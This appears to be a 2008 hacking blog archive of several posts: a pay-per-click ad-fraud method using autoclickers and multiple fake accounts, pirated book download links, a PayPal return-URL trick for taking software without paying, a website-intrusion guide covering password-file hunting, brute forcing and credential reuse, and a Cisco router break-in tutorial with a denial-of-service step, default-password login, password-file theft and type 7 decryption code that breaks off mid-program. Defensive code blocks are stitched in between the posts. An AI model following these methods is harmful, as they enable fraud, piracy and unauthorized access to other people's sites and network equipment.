Friday, 29 August 2008

ASTALAVISTA Security Toolbox DVD v5.0

Astalavista's Security Toolbox DVD 2008 (v5.0) is considered to be the largest and most comprehensive Information Security archive. As always we are committed to provide you with a resource for all of your security and hacking interests, in an interactive way! The Information found on the Security Toolbox DVD has been carefully selected, so that you will only browse through quality information and tools. No matter if you are a computer enthusiast, a computer geek, a newbie looking for information on "how to hack", or an IT Security professional looking for quality and up to date information for offline use or just for convenience, we are sure that you will be satisfied, even delighted by the DVD!

- Extremely comprehensive (about 2'562 Tools!)
- Very well sorted archive with detailed descriptions (276 categories!)
- Improved performance of the Security Toolbox; information has never been easier to find




Thursday, 28 August 2008

SIPcrack - SIP Login Dumper & Hash/Password Cracker

SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol.

The tools offer support for pcap files, wordlists and many more to extract all needed information and bruteforce the passwords for the sniffed accounts.

If you don’t have OpenSSL installed or encounter any building problems try ‘make no-openssl’ to build with integrated MD5 function (which is slower than the OpenSSL implementation).

Usage

Use sipdump to dump SIP digest authentications to a file. If a login is found, the sniffed login is written to the dump file. See ‘sipdump -h’ for options.

Use sipcrack to bruteforce the user password using the dump file generated by sipdump. If a password is found, the sniffed login in the dump file is updated. See ‘sipcrack -h’ for options.

http://www.codito.de/prog/SIPcrack-0.3pre.tar.gz

Wednesday, 27 August 2008

Cheating Bux .to, IT'S NOT SPAM, NO REFERRAL LINKS

Note: I don't post up referral links. I only post the original sites. The original website is the link above, without the spaces. I only put spaces in the links, because it comes up as "*Censored*".

Note: This is not one of those "How to make free money!" tutorials that are usually labeled as spam. This is one of those tutorials that help you in the process, and hopefully make it easier to deal with clicking ads.

Bux . to is a PPC site, literally meaning pay-per-click. You click ads, and leave them up for 30 seconds. For every ad you view, you get one cent ($0.01). Bux . to doesn't allow you to make more than one account on your computer, and repeatedly clicking ads can get tiring. This method will show you how to "cheat" bux . to.

Getting Started

Sign up with bux . to, with no referrals. You also need an account on paypal, for when you want to "cashout" from bux . to.

Autoclickers

An autoclicker allows you to automatically click ads, instead of manually clicking.

The Bux . to Autoclicker made by "mlsoftware" can get you banned, but this method will not involve that program. That program uses up a constant amount of RAM, and can be highly ineffective, as well as detected.

Instead, we are going to use Firefox, in conjunction with Mozilla add-ons.

1) You will need to download these extensions:

ReloadEvery: https://addons.mozilla.org/en-US/firefox/addon/115
Greasemonkey: https://addons.mozilla.org/en-US/firefox/addon/748

2) Download one of these scripts for the "autoclicking" process:

Low Bandwidth Usage: Refreshes page every 20 sec.
Medium Bandwidth Usage: Refreshes page every 10 sec.
High Bandwidth Usage: Refreshes page every 5 sec.
Insane Bandwidth Usage: Refreshes page every 2 sec.

3) Navigate to the page where the ads are displayed. There will be a box above the ads, telling you when ads are being clicked, when they're finished, and when all the ads are finished. The only thing you will have to do is leave firefox open. I suggest leaving this on overnight, or even the whole day, to click as many ads as possible; about 150 ads on average come up during the whole day.

4) *Optional*: Set reload every to 15 minutes (Click the arrow next to the reload box, and select 15m). This is for failsafe purposes. I personally do not use this, but you can if you want.

Multiple Accounts

To create multiple accounts, log off your current account if you haven't already. Then, clear your cache and your cookies. Register an account, and once you're done, clear your cache/cookies again. Repeat this process as many times as you want. I suggest making at least 10 accounts. Remember to make your referrer as your original account, so that your new accounts will earn money, and your original account will earn money too (100% referral bonus).

Hacking: the art of exploitation

This book is for the security pro or would-be hacker who wants to begin to see how deep the rabbit hole really does go. There is no other book like it on the market, and I've read most of them. Jon Erickson's code included in the book all works well as designed on Linux. The author also suggests some good free Linux tools for use with the code examples including most notably a hex editor, basic disassembler, and packet injector.
The techniques in the book are best described by a caption on its back cover, "The fundamental techniques of serious hacking." It includes major sections on programming, networking, and cryptography. All material is covered with an eye towards exploitation. Languages used in the book material consist of C, PERL, and Assembly for X86.

The techniques described in this book are fundamental to any hacker or security professional who takes their work seriously. The book is well worth the discounted amazon.com price. The material in this book is all original and cannot be found elsewhere. Each example in the programming section is truly an eye opener if you are new to code hacking. The examples in the networking and cryptography sections are relevant and fresh as well.

It is a computer security and network security book. All of the examples in the book were developed, compiled, and tested on Gentoo Linux.

http://rapidshare.com/files/27388573/Hacking-The_Art_of_Exploitation.rar.html

Exploiting Paypal order system

So you decided to purchase downloadable software that requires you to pay via PayPal? If, when the link was compiled, they decided it would be much better not to encrypt the link, they just opened a nice hole for us.

1) Basically all you want to do is open the source of the pay page then search for the keyword "return".

right click -> view source || or view -> page source

You should always use a proxy for safety but it is not really necessary, as you could always argue you wanted to buy it then decided not to.

2) You should find a value; copy it and paste it into your browser.

Example:



3) you should now see a thank you page, giving you the URL to download the program!


Remember there has to be a thank you page with the URL or this exploit will not work. The program cannot be emailed to you by using this exploit. It just won't work.

If you find sites that allow you to use this exploit, paste it in here and I will edit this post and add them here:

http://www.ramphelp.com/halfpipe.html [Patched - they use the email now]

Written by Nazim
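The fix for the flaw described above, as an added example that is not part of the original post: the thank-you page only issues a download link for an order the server has itself recorded as paid, and the link is signed and expires, so copying the "return" URL out of the page source yields nothing. All function names, the key and the order ids are hypothetical, and `PAID_ORDERS` stands in for a real order database.

```python
import hashlib
import hmac
import time

SIGNING_KEY = b"constructed-demo-key"  # constructed value; load real keys from config
PAID_ORDERS = set()                    # assumption: stands in for the shop's order table


def thank_you_vulnerable(order_id):
    """The pattern the post describes: whoever requests the return URL
    is shown the download link, paid or not."""
    return "/downloads/program.zip"


def record_verified_payment(order_id):
    """Call only from the server-side handler that has confirmed the
    payment with the payment processor, never from the browser redirect."""
    PAID_ORDERS.add(order_id)


def sign(order_id, expires):
    """HMAC over the order id and expiry, so neither can be altered."""
    msg = ("%s:%d" % (order_id, expires)).encode()
    return hmac.new(SIGNING_KEY, msg, hashlib.sha256).hexdigest()


def issue_download_params(order_id, now=None, ttl=900):
    """Hardened thank-you page: returns signed link parameters for a paid
    order, or None when the server has no record of payment."""
    if order_id not in PAID_ORDERS:
        return None
    now = int(time.time() if now is None else now)
    expires = now + ttl
    return {"order": order_id, "expires": expires, "sig": sign(order_id, expires)}


def download_allowed(params, now=None):
    """Download handler: accept only an unexpired, untampered link that
    still refers to a paid order."""
    now = int(time.time() if now is None else now)
    order_id = str(params.get("order", ""))
    try:
        expires = int(params.get("expires"))
    except (TypeError, ValueError):
        return False
    expected = sign(order_id, expires)
    supplied = str(params.get("sig", ""))
    # Constant-time comparison; bytes avoid errors on non-ASCII input.
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False
    return now <= expires and order_id in PAID_ORDERS


if __name__ == "__main__":
    print("unpaid order  :", issue_download_params("A100", now=1000))
    record_verified_payment("A100")
    link = issue_download_params("A100", now=1000)
    print("paid order    :", link)
    print("within expiry :", download_allowed(link, now=1500))
    print("after expiry  :", download_allowed(link, now=2000))
    print("other order   :", download_allowed(dict(link, order="B200"), now=1500))
```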

Exploiting Software: How to Break Code

How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.

Exploiting Software is loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.

This must-have book may shock you, and it will certainly educate you. Getting beyond the script kiddie treatment found in many hacking books, you will learn about:

- Why software exploit will continue to be a serious problem
- When network security mechanisms do not work
- Attack patterns
- Reverse engineering
- Classic attacks against server software
- Surprising attacks against client software
- Techniques for crafting malicious input
- The technical details of buffer overflows
- Rootkits

Exploiting Software is filled with the tools, concepts, and knowledge necessary to break software.

Download:

http://rapidshare.com/files/49900600/ESHTBTC.rar

EXPLOITING 101 - The Basics


NOTE: Some statements in here apply to beginners. If you read this and are an advanced user, you might say: "That is not true, I know a way....". Correct. But it is impossible to include every exception and technique without creating confusion. Read this essay as if you are a beginner....

NOTE 2: Some basic rules all good crackers and exploiters adhere to: Do not change, alter, or delete any info you may find on a site. This is just not done, and can actually result in prosecution if you get caught.
On your exploiting journey, you may also come across confidential information from members, such as home addresses, credit card info etc. I know I have, many times over. I even found a hole where I could have the checks of site referrals sent to my account! Never use this information to your personal gain! This will be considered theft and misuse of personal information, and can get you into serious trouble...

OK, now with that out of the way, let's start the series on Exploiting...!

EXPLOITING - THE BASICS
OK, so you are tired of bruteforcing, have spoofed a couple of sites, and have seen posts with custom passes or complete member lists...and you wanna know how... If so, this essay is for you.

This basic exploiting essay assumes you understand or master the following techniques and skills with respect to website security:
- Basic HTML
- Brute forcing
- Proxy use
- Basic URL handling
- Basic website structures
- Basic Spoofing
- Good AD skills or similar

But most importantly, you need a good brain and have a sincere interest in website security. Exploiting takes a lot of time and requires research on a regular basis. On the other hand, the rewards are well worth the effort in my opinion!

When trying to test the security of websites, you can gain access in the following manners, listed in order of technical difficulty:
1. Guess passwords
2. Brute force attacks
3. Spoof the site
4. Get and decrypt passfiles or logs
5. Using scripts to add passes
6. Get admin access (via telnet or browser)
7. Hack the server via telnet

As you can see in the list above, exploiting is really nothing more than increasing your chances of getting access. Guessing passwords...to bruteforcing...to decrypting passfiles or logs...you increase your chances of getting a working pass with less effort!

HTACCESS and HTPASSWD
Since there are excellent tuts on this already, I am not going to spend a lot of time on this. One question I see a lot from newbies is that they "can not locate the htpasswd"....

A few notes on htaccess and htpasswd:
- htaccess only sometimes shows the dir to the htpasswd (or passwd or different name)
- the chances of getting this file are slim, as this vulnerability is well-known out there and most webmasters have denied you access, hidden the file, or placed the file on their home dir.

For the fans, here is some more detailed info on the subject I found:
In order to find the .htpasswd (or interpret the .htaccess) you need to understand the difference between the web root and the system root.

The AuthUserFile is specified in terms of the system root. That is, the directory structure you would see if you were actually logged into the computer through a terminal.

When a web browser accesses a machine, it is through a web server. The web server is configured so that the browser will start at some specific directory in the machine. I refer to that as the web root. It is specified in the web server configuration file, off in some directory you can't browse to.

So, let's say that the web root is set to /home/users/www.site.com/www. When you surf to http://www.site.com/ you find yourself in the machine directory /home/users/www.site.com/www (but nothing really tells you that), and if there is an index.html there, you will display it.

So let's say that the web root is set as above, and that the .htaccess contains the line:



code:
--------------------------------------------------------------

AuthUserFile /home/users/www.site.com/www/hidden/.htpasswd

--------------------------------------------------------------
(or something similar)

Applying what I said above, you would find the .htpasswd at:


code:
--------------------------------------------------------

http://www.site.com/hidden/.htpasswd

--------------------------------------------------------


This is because the web root is /home/users/www.site.com/www. You still may not be able to read it, because it might be forbidden through some other method, say only accessible from certain IP addresses, or dot-files may not be accessible through their web server.

Now, let's say the .htaccess said:


code:
--------------------------------------------------------------

AuthUserFile /home/users/abc.com/hidden/.htpasswd

--------------------------------------------------------------

Now, there is no way we can get to it, since the web root puts us in /home/users/www.site.com/www and we are well past the days when you could back up above a web root in an Apache web server.

If ../ worked, we would be in luck, since we could specify http://www.site.com/hidden/.htpasswd
This used to work, or the unicoded version worked, or the double unicoded version worked, or quotes worked, or unicoded quotes, etc., etc. Not so anymore....

Our only hope, when the .htpasswd is not on the web root, is to find another exploit that will allow us to access files. Such things exist but are hard to find, so read on....
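The web root versus system root mapping above can be turned into an audit check for administrators. The following is an added example, not code from the original essay: it reads the AuthUserFile lines of an .htaccess file and reports whether each password file sits inside the web root and, if so, at which URL it would be served. The function names and the `/etc/apache2` default for ServerRoot are assumptions; the paths are the ones used in the text.

```python
import posixpath


def parse_auth_user_files(htaccess_text):
    """Return the AuthUserFile arguments found in .htaccess text."""
    found = []
    for line in htaccess_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        parts = stripped.split(None, 1)
        # Apache directive names are case-insensitive.
        if len(parts) == 2 and parts[0].lower() == "authuserfile":
            found.append(parts[1].strip().strip('"'))
    return found


def url_path_for(system_path, web_root):
    """Map a system path to the URL path it is served at, or None when it
    lies outside the web root. normpath collapses '..' segments first, so
    <root>/../private is correctly treated as outside <root>."""
    root = posixpath.normpath(web_root)
    path = posixpath.normpath(system_path)
    if path == root:
        return "/"
    if path.startswith(root + "/"):
        return path[len(root):]
    return None


def audit(htaccess_text, web_root, host, server_root="/etc/apache2"):
    """Return (AuthUserFile, verdict, url) for every AuthUserFile line.
    server_root is an assumed default; set it to the real ServerRoot."""
    results = []
    for raw in parse_auth_user_files(htaccess_text):
        # Apache resolves a relative AuthUserFile against ServerRoot.
        full = raw if raw.startswith("/") else posixpath.join(server_root, raw)
        url_path = url_path_for(full, web_root)
        if url_path is None:
            results.append((raw, "outside-web-root", None))
        else:
            results.append((raw, "inside-web-root", "http://" + host + url_path))
    return results


if __name__ == "__main__":
    web_root = "/home/users/www.site.com/www"
    for text in (
        "AuthUserFile /home/users/www.site.com/www/hidden/.htpasswd",
        "AuthUserFile /home/users/abc.com/hidden/.htpasswd",
    ):
        for raw, verdict, url in audit(text, web_root, "www.site.com"):
            print(verdict, raw, url or "")
```

A file reported as inside the web root should be moved out of it; a rule denying requests for `.ht*` files is a second layer, not a substitute.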

SO NOW WHAT?
Well, as you tried to get the passfile looking for it in the obvious locations, and failed...maybe there are other ways of obtaining it....

Using AD or another security scanner, you can start looking for so-called vulnerabilities. This means testing the website for security, and trying to find ways into the site. How does this work, you ask? We need a tool to test the security...

For these essays, I will be talking about a tool called WebSiteFinder, or WSF in short. Written by Wolfman, this is a great tool, in my opinion. AD or Passcraft can do the same, so use whatever you feel comfortable with. If you start out, use AD.

To make these tools really effective, you need an exploit list. This is a list of basic paths that will be tested for possible vulnerabilities or access against the website. AD offers a basic exploit list, at least the older versions did. Exploit lists can be found all over the web, but please realise these are very basic, and some of the holes (=vulnerabilities) they have in it, are old and will not work anymore on most sites.

HOW TO MAKE YOUR OWN EXPLOIT LIST
Really good exploiters or crackers will not share their lists with you. The reason: Once some exploits are made public, chances are the holes will be discovered quickly and thus closed! And that is a bummer.

So you have to build your own list. How, you ask? Here are a few tips.

1. ANALYZE, THINK, STUDY, BE CREATIVE
First place to start, is to analyze your current exploit list. What makes sense, and what does not. What paths do you understand? Why do you think that particular path is a vulnerability, and if you came across it, how would you use it? If you don't know, ask on a forum via PM, there are many people around that can and will help you. Moreover, read up on security sites (better get used to it), such as packetstorm, securiteam, etc.

NOTE: It is no use to just try exploits on sites if you don't understand what you are doing. The results can be very bad. You could, unwillingly, do damage to the site!

2. KEEP YOUR EYES ON THE SCREEN
Look at directory trees of sites you visit. Try to go up and down in levels in the dir to possibly find more holes...copy these to your exploit list.

3. STATS and LOGS
These are KING in my book. Why? Stats show the requests made to a website, and some stats list all the requests....including those of someone trying to exploit the site. The paths that this person tried may not have worked on the site, but heh, copy them to your exploit list, they may come in handy for other sites! Access logs show the same thing...moreover, they might tell you a lot about the server, home server (FTP logs), usernames, and the basic website structure.

INTERMEZZO: "What to do with the usernames?"
This is a question I get a lot. Someone has seen the stats, and now has a list of usernames. Now what? Well, half the battle is won! Remember the statement I made about increasing your chances in getting access? This is it! Proceed in two ways:
1. Use the usernames and one of your wordlists to do a BF attack
2. Match the usernames to working combos you have. There are tools for this, and try to see if the combos work. Many users use the same password for different sites...see where I am getting at?

4. GOOGLE, GOOGLE, GOOGLE!
I love google. I embrace googling. You should too. Make googling your hobby! Type in a path or exploit, and see what you get, you will be surprised! It will lead you to access logs, vulnerability reports, cool sites, etc. Whatever you find and think is useful, copy to your exploit list...
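Seen from the site owner's side, the exploit-list scanning and the readable stats and logs described in this essay both show up in the access log. The following added example, not part of the original essay, flags clients that request several distinct sensitive paths and separately reports any such request that was answered with a 2xx status. The log lines are constructed, the addresses are documentation ranges, and the path patterns and threshold are assumptions to tune per site.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Paths the essay talks about: password files, directory traversal,
# and publicly readable stats or log directories.
PROBE_RE = re.compile(r'\.\.[/\\]|/\.ht(access|passwd)|/(stats|logs?)(/|$)')

SAMPLE_LOG = """\
192.0.2.10 - - [27/Aug/2008:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 1043
198.51.100.7 - - [27/Aug/2008:10:00:02 +0000] "GET /.htpasswd HTTP/1.0" 403 210
198.51.100.7 - - [27/Aug/2008:10:00:03 +0000] "GET /hidden/.htpasswd HTTP/1.0" 404 208
198.51.100.7 - - [27/Aug/2008:10:00:04 +0000] "GET /..%252f..%252fetc/passwd HTTP/1.0" 404 208
198.51.100.7 - - [27/Aug/2008:10:00:05 +0000] "GET /stats/ HTTP/1.0" 200 5120
203.0.113.5 - - [27/Aug/2008:10:01:00 +0000] "GET /members/.htaccess HTTP/1.0" 403 210
"""  # constructed sample, not taken from a real server


def normalise(path):
    """Percent-decode repeatedly so single- and double-encoded traversal
    sequences are matched in their plain form."""
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.lower()


def analyse(lines, min_distinct=3):
    """Return (scanners, exposed).
    scanners: {ip: sorted probe paths} for clients with at least
              min_distinct distinct sensitive paths requested.
    exposed:  [(ip, path)] for sensitive paths answered with 2xx."""
    probes = defaultdict(set)
    exposed = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        path = normalise(match.group("path"))
        if not PROBE_RE.search(path):
            continue
        probes[match.group("ip")].add(path)
        if match.group("status").startswith("2"):
            exposed.append((match.group("ip"), path))
    scanners = {ip: sorted(paths) for ip, paths in probes.items()
                if len(paths) >= min_distinct}
    return scanners, exposed


if __name__ == "__main__":
    scanners, exposed = analyse(SAMPLE_LOG.splitlines())
    for ip, paths in scanners.items():
        print("probable scanner", ip, paths)
    for ip, path in exposed:
        print("sensitive path served", path, "to", ip)
```

Entries in `exposed` are the ones to act on first: they mean a stats page, log directory or password file is actually being served.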

Exploiting Cisco Systems

--------------------------
Exploiting Cisco Systems
(Even From Windows!)



Warning:
DO NOT use this to damage cisco systems, or gain unauthorized access to systems. This tutorial is just something to
use for educational purposes. Only use this information in a legal way (the hacker wargames for instance), and do
not damage or destroy anything. This is a step-by-step guide on how a series of proven cisco exploits can be used to
gain access. If you get caught breaking into a cisco router, or screw the system up, you can interrupt hundreds of
internet clients, and cost thousands of dollars, so only use this when you are allowed!! Using this the wrong way
will get you into a lot of trouble.


----------------------------------
Table of Contents:
----------------------------------
Before you start:

- What is an IP address?

- What is an ISP?

- What is a TCP/IP packet?

- How to spoof your IP

- How to use Telnet

- How to use HyperTerminal

- How to use Ping

- How to use TraceRoute

- How to use a proxy server

-------------------------------------

- Section 1: why hack a cisco router?

- Section 2: how to find a cisco router

- Section 3: how to break into a cisco

- Section 4: how to break the password

- Section 5: how to use a cisco router

-----------------------------------

Stuff you'll need to know BEFORE you start:

-----------------------------------

What is an IP address?

IP stands for Internet Protocol, IP addresses are used by other computers to identify computers that connect to
them. This is how you can be banned from IRC, and how they can find your ISP. IP addresses are easily obtained, they
can be retrieved through the following methods:

-you go to a website, your IP is logged

-on IRC, anyone can get your IP

-on ICQ, people can get your IP, even if you have the option set "do not show ip"
they can still get it

-if you are connected to someone, they can type "systat", and see who is connected to them

-if someone sends you an email with IP-logging java, they can also get your IP address

There are many more ways of obtaining IP addresses, including using back-door programs such as Sub7 or NetBus.

------------------------------------

What is an ISP?

ISP stands for Internet Service Provider, they are the ones that give you the internet. You connect to one every time
you dial-up and make a connection. People can find your ISP simply by running a traceroute on you (traceroute is
later explained). It will look something like this:

tracert 222.222.22.22

Tracing route to [221.223.24.54]
over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target's isp
10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.

-----------------------------------

What is a TCP/IP packet?

TCP/IP stands for Transmission Control Protocol and Internet Protocol, a TCP/IP packet is a block of data which is
compressed, then a header is put on it and it is sent to another computer. This is how ALL internet transfers occur,
by sending packets. The header in a packet contains the IP address of the one who originally sent the packet. You
can re-write a packet and make it seem like it came from anyone!! You can use this to gain access to lots of systems
and you will not get caught. You will need to be running Linux or have a program which will let you do this. This
tutorial does not tell you to use this on a Cisco router, but it does come in handy when hacking any system. If
something goes wrong when you try to hack a system, you can always try this...

------------------------------------

How to spoof your IP:

Find a program like Genius 2 or DC IS, which will let you run IdentD. This will let you change part of your
computer's identity at will! Use this when you get banned from some IRC chat room.... you can get right back in! You
can also use it when you are accessing another system, so it logs the wrong id...

------------------------------------

How to use telnet:

You can open telnet simply by going to your Start Menu, then to Run, and typing in "telnet".

Once you have opened telnet, you may want to change some features. Click on Terminal>Preferences. Here you can
change the buffer size, font, and other things. You can also turn on/off "local echo", if you turn local echo on,
your computer will show you everything you type, and the other computer you are connected to will show you as well.
So you may get something like this;

You type "hello", and you get
hhelelollo

This is because the information has bounced back and got scrambled with what you typed. The only reason I would use
this is if the machine does NOT return what you are typing.

By default, telnet will connect to a system on the telnet port, which is port 23. Now you will not always want to
connect to port 23, so when you go to connect, you can change the port to maybe 25, which is the port for mail
servers. Or maybe port 21, for FTP. There are thousands of ports, so make sure you pick the right one!

----------------------------------

How to use HyperTerminal:

HyperTerminal allows you to open a "server" on any port of your computer to listen for incoming information from
specified computers. To use this, go to
Start>Programs>Accessories>Communications>HyperTerminal. First you will need to select the connection, pick "TCP/IP
Winsock", and then put in the computer to communicate with, and the port #. You can tell it to listen for input by
going to Call>Wait for Call. Now the other computer can connect to you on that port, and you can chat and transfer
files.

----------------------------------

How to use Ping:

Ping is easy, just open the MS-DOS prompt, and type "ping ip.address", by default it will ping 3 times, but you can
type

"ping ip.address -t"

Which will make it ping forever. To change the ping size do this:

"ping -l (size) ip.address"

What ping does is send a packet of data to a computer, then sees how long it takes to be returned, which determines
the computer's connection speed, and the time that it takes for a packet to go back and forth (this is called the
"trip time"). Ping can also be used to slow down or even crash a system if the system is overloaded by ping floods.
Windows 98 crashes after one minute of pingflooding (its connections buffer is overflowed - too many connections are
registered, and so Windows decides to take a little vacation).
A ping flood attack takes a lot of bandwidth from you, and you must have more bandwidth than your target (unless
the target is a Windows 98 box and you have an average modem, that way you'll knock it down after approximately a
single minute of ping flooding). Ping flooding isn't effective against stronger targets, unless you have quite a few
evil lines to yourself, and you have control over a few bandwidth-savvy hosts that can ping flood your target as
well.
Note: DOS's -t option doesn't do a ping flood, it just pings the target continuously, with intervals from one ping to
another. In every Unix or Linux distribution, you can use ping -f to do a real pingflood. Actually ping -f is
required if you want your distribution to be POSIX-compliant (POSIX - Portable Operating System Interface based on
uniX), otherwise it's not a real Unix/Linux distribution, so if you have an OS that calls itself either Unix or
Linux, it has the -f switch.

----------------------------------

How to use TraceRoute:

To trace your connection (and see all the computers between you and a target), just open the MS-DOS prompt, and
type "tracert ip.address" and you will see a list of computers, which are between you and the target computer.

You can use this to determine if there are firewalls blocking anything. It will also allow you to determine
someone's ISP (internet service provider).

To determine the ISP, simply look at the IP address before the last one, this should be one of the ISP's routers.

Basically, this is how traceroute works - a TCP/IP packet has a value in its header (it's in the IP header. If you
don't know what this means, then ignore it and continue reading, it's not that crucial) called TTL, which stands
for Time To Live. Whenever a packet hops (travels through a router) its TTL value is decreased by one. This is just
a countermeasure against the possibility that something would go wrong and a packet would ricochet all around the
net, thus wasting bandwidth.
So when a packet's TTL reaches zero, it dies and an ICMP error is sent back to the sender.
Now, traceroute first sends a packet with a TTL value of 1. The packet quickly returns, and by looking at the
sender's address in the ICMP error's header, the traceroute knows where the packet has been in its first hop. Then
it sends a packet with a TTL value of 2, and it returns after the second hop, revealing its identity. This goes on
until the packet reaches its destination.

Now isn't that fun? :-)

----------------------------------

How to use a proxy server:

Do a search on the web for a proxy server which runs on the port of your choice. Once you find one, connect to it
with either telnet or hyperterminal and then connect to another computer through the proxy server. This way the
computer at the other end will not know your IP address.

----------------------------------

Section 1: why hack a cisco router?

You probably are wondering.. why hack into a cisco router?

The reason is that they are useful when it comes to breaking into other systems...

Cisco routers are very fast, some with 18 T1 connections on one system, and they are very flexible and can be used
in DoS attacks or to hack other systems since most of them run telnet.

They also have thousands of packets going through them at any one time, which can be captured and decoded... A lot
of cisco routers are also trusted systems, and will let you have a certain amount of access to other computers on
its network.

----------------------------------

Section 2: finding a cisco router

Finding a cisco router is a fairly easy task, almost every ISP will route through at least one cisco router. The
easiest way to find a cisco router is to run a traceroute from dos (type "tracert" and then the IP address of
anyone's computer), you can trace pretty much anyone because the trace will show all of the computer systems between
your computer and their computer. One of these systems will probably have the name "cisco" in its name. If you find
one like this, copy down its IP address.

Now you have the location of a cisco router, but it may have a firewall protecting it, so you should see if it's
being blocked by pinging it a couple times, if you get the ping returned to you, it might not be blocked. Another
way is to try to access some of the cisco router's ports, you can do this simply by using telnet, and opening a
connection to the router on port 23.. If it asks for a password, but no username, you are at the router, but if it
wants a username as well, you are probably at a firewall.

Try to find a router without a firewall, since this tutorial is on the routers and not how to get past the
firewalls. Once you're sure you have found a good system, you should find a proxy server which will allow you to use
port 23, this way your IP will not be logged by the router.

---------------------------------

Section 3: how to break into a cisco router

Cisco routers running v4.1 software (which currently is most of them) will be easily disabled. You simply connect to
the router on port 23 through your proxy server, and enter a HUGE password string, something like;

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

Now wait, the cisco system might reboot, in which case you can't hack it because it is offline.. But it will
probably freeze up for a period of 2-10 minutes, which you must use to get in.

If neither happens, then it is not running the vulnerable software, in which case you can try several DoS attacks,
like a huge ping. Go to dos and type "ping -l 56550 cisco.router.ip -t", this will do the same trick for you.

While it is frozen, open up another connection to it from some other proxy, and put the password as "admin", the
reason for this is because by default, this is the router's password, and while it is temporarily disabled, it will
revert to its default state.

Now that you have logged in, you must acquire the password file! The systems run different software, but most will
have a prompt like "htl-textil" or something, now type "?" for a list of commands, you will see a huge list of
commands, somewhere in there you will find a transfer command, use that to get the password file of admin (which is
the current user) and send it to your own IP address on port 23. But before you do this, set up HyperTerminal to
wait for a call from the cisco router. Now once you send the file, HyperTerminal will ask you if you want to accept
the file that this machine is sending you, say yes and save it to disk. Logout.

You are now past the hardest part, give yourself a pat on the back and get ready to break that password!

------------------------------

Section 4: breaking the password

Now that you have acquired the password file, you have to break it so you can access the router again. To do this,
you can run a program like John the Ripper or something on the password file, and you may break it.

This is the easiest way, and the way I would recommend. Another way would be to try and decrypt it. For this you
will need some decryption software, a lot of patience, and some of the decryption sequences.

Here is a sequence for decrypting a cisco password, you have to compile this in linux:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* XOR key bytes for Cisco "type 7" passwords, as given in this listing. */
char xlat[] = {
    0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
    0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
    0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

/* Config-line prefixes that introduce a type 7 string. */
char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";

char *pname;

/*
 * Decode a type 7 string into dec_pw (at most dec_size bytes, NUL included).
 * The first two decimal digits are the starting offset into xlat; each
 * following pair of hex digits is one byte XORed with the next key byte.
 * Returns 0 on success, -1 on malformed input or when the string needs
 * more key bytes or more output space than are available.
 */
int cdecrypt(const char *enc_pw, char *dec_pw, size_t dec_size)
{
    size_t len = strlen(enc_pw), i, n = 0;
    unsigned int seed, val;
    int j, c;

    if (len < 2 || (len & 1) || dec_size == 0)
        return -1;

    if (!isdigit((unsigned char)enc_pw[0]) || !isdigit((unsigned char)enc_pw[1]))
        return -1;

    seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
    if (seed > 15)
        return -1;

    for (i = 2; i < len; i += 2) {
        val = 0;
        for (j = 0; j < 2; j++) {
            c = toupper((unsigned char)enc_pw[i + j]);
            val *= 16;
            if (isdigit(c))
                val += c - '0';
            else if (c >= 'A' && c <= 'F')
                val += c - 'A' + 10;
            else
                return -1;
        }
        /* Stay inside the key table and the output buffer. */
        if (seed >= sizeof(xlat) || n + 1 >= dec_size)
            return -1;
        dec_pw[n++] = (char)(val ^ xlat[seed++]);
    }

    dec_pw[n] = 0;
    return 0;
}

void usage(void)
{
    fprintf(stdout, "Usage: %s -p <encrypted password>\n", pname);
    fprintf(stdout, "       %s <router config file> [output file]\n", pname);
}

int main(int argc, char **argv)
{
    FILE *in = stdin, *out = stdout;
    char line[257];
    char passwd[65];
    size_t pw_pos;

    pname = argv[0];

    if (argc > 3) {
        usage();
        exit(1);
    }

    if (argc > 1 && argv[1][0] == '-') {
        switch (argv[1][1]) {
        case 'h':
            usage();
            break;

        case 'p':
            if (argc < 3 || cdecrypt(argv[2], passwd, sizeof(passwd))) {
                fprintf(stderr, "Error.\n");
                exit(1);
            }
            fprintf(stdout, "password: %s\n", passwd);
            break;

        default:
            fprintf(stderr, "%s: unknown option.\n", pname);
        }
        return 0;
    }

    if (argc > 1 && (in = fopen(argv[1], "r")) == NULL)
        exit(1);
    if (argc > 2 && (out = fopen(argv[2], "w")) == NULL)
        exit(1);

